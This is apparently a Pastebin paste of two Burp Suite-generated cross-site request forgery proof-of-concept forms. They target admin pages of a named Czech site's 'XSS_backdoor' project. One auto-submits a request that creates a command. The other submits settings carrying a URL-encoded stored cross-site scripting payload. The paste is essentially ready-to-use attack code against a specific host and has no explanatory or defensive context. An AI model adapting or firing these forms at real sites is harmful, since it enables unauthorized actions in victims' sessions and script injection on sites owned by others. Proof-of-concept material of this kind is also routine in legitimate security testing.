Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <html>
- <!-- CSRF PoC - generated by Burp Suite Professional -->
- <body>
- <h1>CSRF 1 - vytvoreni prikazu</h1>
- <form action="https://www.soom.cz/projects/XSS_backdoor/admin/prikaz.php" method="POST">
- <input type="hidden" name="nazev" value="xss" />
- <input type="hidden" name="typ" value="1" />
- <input type="hidden" name="parametry" value="xss" />
- <input type="hidden" name="skript" value="xss" />
- <input type="hidden" name="s1" value="Vytvo�™it" />
- <input type="submit" value="Submit request" />
- </form>
- </body>
- </html>
- <html>
- <!-- CSRF PoC - generated by Burp Suite Professional -->
- <body>
- <h1>CSRF 2 - stored xss</h1>
- <form action="https://www.soom.cz/projects/XSS_backdoor/admin/nastaveni.php?idclient=18f43d79bb" method="POST">
- <input type="hidden" name="nazev" value="xss" />
- <input type="hidden" name="url" value="http://" />
- <input type="hidden" name="url1" value="http://" />
- <input type="hidden" name="script" value="43" />
- <input type="hidden" name="script1" value="0" />
- <input type="hidden" name="parametry" value="zzzzz%27%22%3E%3Cscript%3Ealert%281%29%3C/script%3E" />
- <input type="hidden" name="parametry1" value="" />
- <input type="hidden" name="s1" value="Upravit" />
- <input type="submit" value="Submit request" />
- </form>
- </body>
- </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement